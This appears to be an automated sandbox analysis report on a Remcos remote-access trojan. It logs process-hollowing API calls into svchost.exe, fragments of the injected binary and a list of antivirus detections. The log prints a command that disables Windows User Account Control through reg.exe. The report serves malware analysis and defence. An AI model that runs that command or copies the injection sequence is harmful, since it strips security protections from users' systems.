CreateProcessInternalW Sept. 7, 2021, 8:23 a.m.	thread_identifier: 2428 thread_handle: 0x000000c4 process_identifier: 2168 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000c0	1	1
CreateProcessInternalW Sept. 7, 2021, 8:23 a.m.	thread_identifier: 1792 thread_handle: 0x000000c8 process_identifier: 2332 current_directory: filepath: track: 1 command_line: c:\program files (x86)\google\chrome\application\chrome.exe filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000000d0	1	1
NtGetContextThread Sept. 7, 2021, 8:23 a.m.	thread_handle: 0x000000c8		3221225485
CreateProcessInternalW Sept. 7, 2021, 8:23 a.m.	thread_identifier: 1776 thread_handle: 0x000001c0 process_identifier: 2212 current_directory: filepath: track: 1 command_line: C:\Windows\SysWOW64\svchost.exe filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000001bc	1	1
NtGetContextThread Sept. 7, 2021, 8:23 a.m.	thread_handle: 0x000001c0	1	0
NtAllocateVirtualMemory Sept. 7, 2021, 8:23 a.m.	process_identifier: 2212 region_size: 479232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001bc	1	0
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ªB0îâ,cîâ,cîâ,cZ~Ýcüâ,cZ~ßcOâ,cZ~Þcðâ,cç¨cïâ,cpBëcìâ,cÕ¼/bôâ,cÕ¼)bÔâ,cÕ¼(bÌâ,cç¿cûâ,cîâ-cñã,cy¼%b±â,c\|¼Ócïâ,cy¼.bïâ,cRichîâ,cPELMSaàÄl÷0@PÇÜþ80l8Älhl@0t.text¶ `.rdatao0p@@.data\= @À.tls à@À.gfids0ð@@.rsrcþ¢@@.reloc8:¨@B base_address: 0x00400000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: base_address: 0x00401000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: base_address: 0x00453000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ ´tE¸wE²tE..¡FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶F¡FP¶FP¶FP¶FP¶FP¶FP¶FP¶F¡Fÿÿÿÿ¸wE¨¢F¨¢F¨¢F¨¢F¨¢F¡F8zE¸{EEè¡F§FCPSTPDT°¢Fð¢Fÿÿÿÿÿÿÿÿÿÿÿÿ ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ§Fþÿÿÿþÿÿÿu0Ï!tåa¾e¸Â¢z»^ âÈ¨346E.?AVtype_info@@46E.?AVbad_alloc@std@@46E.?AVbad_array_new_length@std@@46E.?AVlogic_error@std@@46E.?AVlength_error@std@@46E.?AVout_of_range@std@@46E.?AV_Facet_base@std@@46E.?AV_Locimp@locale@std@@46E.?AVfacet@locale@std@@46E.?AU_Crt_new_delete@std@@46E.?AVcodecvt_base@std@@46E.?AUctype_base@std@@46E.?AV?$ctype@D@std@@46E.?AV?$codecvt@DDU_Mbstatet@@@std@@46E.?AVbad_exception@std@@46E.H46E.?AVfailure@ios_base@std@@46E.?AVruntime_error@std@@46E.?AVsystem_error@std@@46E.?AVbad_cast@std@@46E.?AV_System_error@std@@46E.?AVexception@std@@ base_address: 0x0046a000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: base_address: 0x0046e000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: +ÔÔ?¤Ø¾Ø?Ù?)s?ÚuZ55g;Ù.~~Dñìð??m(À'ÆØØ®õÐûõÛÝÛÝÛ(jk¡iæÞ\F£ã¥w¡Ô(´öä¼éÙ b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` ¢§µ¶³´±²¯°¸ Y base_address: 0x0046f000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: X0HläSETTINGSÎ/Gíþh×´(e7lìiF7rY¥ð,jE}ÃeÔH±gEÐÔ©ÅßÍYäÄ`ç=^ÈªbÖêäÀô74ãÞ +5¥im£²K1,:ÓÞ:Ú#ÃWªv'Ìóª8vG{íb¹ÝMiF(5³ÜÓ¯l¢DU`ÊÔ2 C`ÊÇï+{¯x9º=ù6áÔü \7Úá`ò_fC'\|ð.±^pKV-:Ëü½/SÛD6 ïv;ÄAðÖºûQçñÞn-3¨ý[UÛ@ BìêbÚxÏìþý"ªñÉü8»ña±á&¸kûO¨üùrB[XxîQV+ÂOK¦£È÷R ù%¼+g½I¹pÑÒoº{{9XÍJòÖ°Ò(\×è4Ç$û±5§9G]¾v/¸? Í&©e%$Fùð¾Ýã º¼À,óØUg7LÇ¸å#^3æèÎú2yÖ1Ç¯r×Iê?T¥y÷oæH¶òc¸û×Ï ¬ 5Gjó$,ÎÁ¸G _öÿ"ªÄáÛ zåÄP¥,ø¢VBOØF\APa<EþéÑ_óéSP¢ÉrÆ£1ÅoJ6ÔÒññtFquáù¨bI´¶µYbLxu¬-ð,ýuá`¢T?ÇC{õ¸ç§í ñÐÂIµ j±Û!ÃZlV>£¾>F N«ÛÎ qÀï úIÞð¼~Â2±:Ñ"£±!ïe»u+ÐPU¹¾ËÙgÒDÈ¨p+eFÏñê±Oaká:çÝr¼z³¡4;À§Lð-= Ê pÅèK6ijU´½ó¦M¨£j³.äèý#KÈ.Õeyæ<\|¹¾þ ææv6kµQê ÜÕÑ790 MÖ>¡±L«Qëåû`òw«öPÐOù[ºàÄIQACþÖ[ËX)ÿÌÚl/íÚÈ ©\|êZlof0¦_È´MhÒêyY·{1kWÒñX(Ô.Xtö¨Å¬¯m.Ð}3Gv²:a¦ÛÔ¡:áy©0#úmÒÈÅêß×®8Ñÿ·-ò¿ë©±á<®iënÊ%Î!\|`6ö"7&UH%ä¦zm9â÷^RBYÝÞËüVAá¥¹º¢<· wHõ3.Å´L\|ú±¶ì!¥ÒºæíCDoÙB_aËó$È²KûÑÑ/QrWÿ¤µÉnm&?8Ü2ýµÔX\|;Öè2æß®Ä¯ÛÓÞ3÷PÆ2×¶÷_Ëß.Ñkµø!q°¸Â+4ZîÈ¯ò Ë "g²AÎ½·HNã ¸Òø\Î±\|óõra Gè'ÖùHV@×åhÝö³,ù+óò éS«éMÁºñraZF¾Y°[a©ZR§\|·GxJÚw«>µ$$æÚQ-¶þ¼Íh×.9gjÝ!2A{¯WâÈ0ËÆVÅÈ\|\`(LýÆ#¹`ëÉ l¿\|f©E6ìt¼«Å2ÎfqWàKûmoèó§°7æ$i¤Ý;ì£3JzhfÁù+»ßhILÒÂÍÇ£CûCcñ÷Æ $ªX[\+8yÔOÈ4¤h%dÛ´îue¤ (èÂÝ©W¡X,&ÁñqÌ½vf<83ÄO²·jtW~W1~ÞÇßqô+ù!: base_address: 0x00470000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: base_address: 0x00471000 process_identifier: 2212 process_handle: 0x000001bc	1	1
WriteProcessMemory Sept. 7, 2021, 8:23 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2212 process_handle: 0x000001bc	1	1
NtSetContextThread Sept. 7, 2021, 8:23 a.m.	registers.eip: 2007957956 registers.esp: 2554328 registers.edi: 0 registers.eax: 4388716 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000001c0 process_identifier: 2212	1	0
NtResumeThread Sept. 7, 2021, 8:23 a.m.	thread_handle: 0x000001c0 suspend_count: 1 process_identifier: 2212	1	0
CreateProcessInternalW Sept. 7, 2021, 8:23 a.m.	thread_identifier: 3016 thread_handle: 0x00000084 process_identifier: 1632 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\reg.exe track: 1 command_line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f filepath_r: C:\Windows\System32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Dropped:Generic.Remcos.510742CA
FireEye	Generic.mg.754cae6c58cfb857
McAfee	Trojan-FTRG!754CAE6C58CF
Cylance	Unsafe
Zillya	Trojan.Generic.Win32.1460119
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 0053ba121 )
K7GW	Trojan ( 0053ba121 )
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	Win32/Rescoms.B
APEX	Malicious
ClamAV	Win.Trojan.Remcos-9753190-0
Kaspersky	HEUR:Trojan.Win32.Generic
BitDefender	Dropped:Generic.Remcos.510742CA
Avast	Win32:RATX-gen [Trj]
Tencent	Malware.Win32.Gencirc.10cec31d
Ad-Aware	Dropped:Generic.Remcos.510742CA
Sophos	Generic ML PUA (PUA)
DrWeb	Trojan.Siggen14.55704
McAfee-GW-Edition	BehavesLike.Win32.Generic.gh
Emsisoft	Dropped:Generic.Remcos.510742CA (B)
Ikarus	Trojan.Win32.Rescoms
Jiangmin	Trojan.Generic.halxu
eGambit	Unsafe.AI_Score_100%
Avira	HEUR/AGEN.1141389
Antiy-AVL	Trojan/Generic.ASMalwS.3458D2D
Gridinsoft	Backdoor.Win32.Remcos.oa!s1
Microsoft	Backdoor:Win32/Remcos.GA!MTB
ZoneAlarm	HEUR:Trojan.Win32.Invader
GData	Win32.Malware.Bucaspys.B
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.RemcosRAT.R418128
BitDefenderTheta	Gen:NN.ZexaF.34126.BCW@aGglGK
ALYac	Dropped:Generic.Remcos.510742CA
MAX	malware (ai score=80)
VBA32	BScope.Backdoor.Remcos
Malwarebytes	Malware.AI.3056317897
Rising	Backdoor.Remcos!1.B6A7 (CLASSIC)
Yandex	Trojan.Agent!wQ4Wbnu/ODE
SentinelOne	Static AI - Malicious PE
Fortinet	W32/Rescoms.M!tr
AVG	Win32:RATX-gen [Trj]
Cybereason	malicious.c58cfb
Panda	Trj/GdSda.A

The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\cmd.exe

explorer.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All